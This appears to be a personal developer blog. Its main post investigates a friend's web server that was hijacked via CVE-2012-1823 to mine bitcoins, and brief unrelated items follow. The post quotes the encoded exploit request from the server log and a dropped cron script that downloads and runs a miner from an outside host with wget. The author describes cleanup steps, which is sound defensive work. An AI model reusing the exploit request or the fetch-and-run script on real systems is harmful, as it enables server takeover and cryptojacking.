Caffeine, silicon and nimesulide

{ 'fullname' : "Michele Zonca", 'tags' : ['developer', 'mashaper', 'caffeinated', 'nerd']}

Investigating on a server hacked to mine bitcoins

A friend of mine had issues with a web server being very slow and sometimes even unavailable.

When I connected I found a process eating all the CPU time available. It was mining bitcoins.

What I found is that they used this vulnerabilty: CVE-2012-1823 to execute arbitrary code.

access.log is full of lines like this one:

127.0.0.1 - - [08/Nov/2013:02:28:52 +0000] “POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.0” 504 529 “-” “-“

Used to download and execute this script:

# cat /tmp/update
#!/bin/sh
plm=`ps x|grep mine.cc.st:3333|grep -v grep|awk ‘{print $7}’`
if [ “$plm” != “” ]
then echo “MERGE!!!”
else
nohup wget http://update.cc.st/a && sh a » /dev/null &
fi

Put in crontab, this script checks if the miner is working, otherwise it downloads and executes it again: http://pastebin.com/4PVDpkCe

Using an apache vulnerability means that the result code will be executed by www-data, without a real console access and with limited privileges over file system.

What I did, so far, is to stop the mining process, add update.cc.st to /etc/hosts poiting to localhost, disable /cgi-bin/php from the default domain and clean the file system. Now I will wait for my friend to decide if she wants to procede with an update or, better, a complete reinstall..

Hurricane on Saturn, via NASA

Hurricane on Saturn, via NASA

On Android 4.2 and newer, Developer options is hidden by default. To make it available, go to Settings > About phone and tap Build number seven times. Return to the previous screen to find Developer options.

Daylight Saving time in the World

Daylight Saving time in the World

Comets Lemmon and PanSTARRS Peaking, APOD

Comets Lemmon and PanSTARRS Peaking, APOD